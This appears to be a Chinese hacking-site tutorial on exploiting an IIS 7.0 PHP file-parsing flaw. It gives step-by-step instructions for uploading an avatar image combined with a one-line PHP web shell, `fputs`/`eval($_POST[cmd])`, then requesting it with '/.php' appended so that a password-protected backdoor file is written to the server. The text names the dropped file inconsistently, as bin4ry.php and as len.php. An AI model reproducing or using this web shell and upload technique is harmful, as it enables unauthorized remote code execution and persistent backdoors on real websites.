WAP手机版 RSS订阅 加入收藏  设为首页
黑客技术
当前位置:首页 > 黑客技术

IIS7.0 php错误文件解析漏洞利用实例

时间:2019/7/8 17:05:47   作者:安琪   来源:www.hack361.com   阅读:0   评论:0
内容摘要:IIS7.0php错误文件解析漏洞利用实例Author:lenhook/Category:[技术文章]www.hack361.com/robots.txt后面加上/任意字符.php成功解析为phpDefault.aspx/.php注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马<...
IIS7.0 php错误文件解析漏洞利用实例 Author: lenhook / Category:  [技术文章] www.hack361.com/robots.txt后面加上/任意字符.php成功解析为php

Default.aspx/.php

 
注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马
 
 
<?fputs(fopen(len.php,w),<?eval($_POST[cmd]);?>)?>
 
如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话,密码cmd
 

上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成len.php  


黑客361(www.hack361.com)


标签:IIS7.0文件解析漏洞 
相关评论

本类更新

本类推荐

本类排行

本站资源来自互联网收集 仅供用于学习和交流 请遵循相关法律法规 本站一切资源不代表本站立场

Copyright 2018 黑客361 www.hack361.com All Rights Reserved 

站长QQ1437232096

技术交流群99802923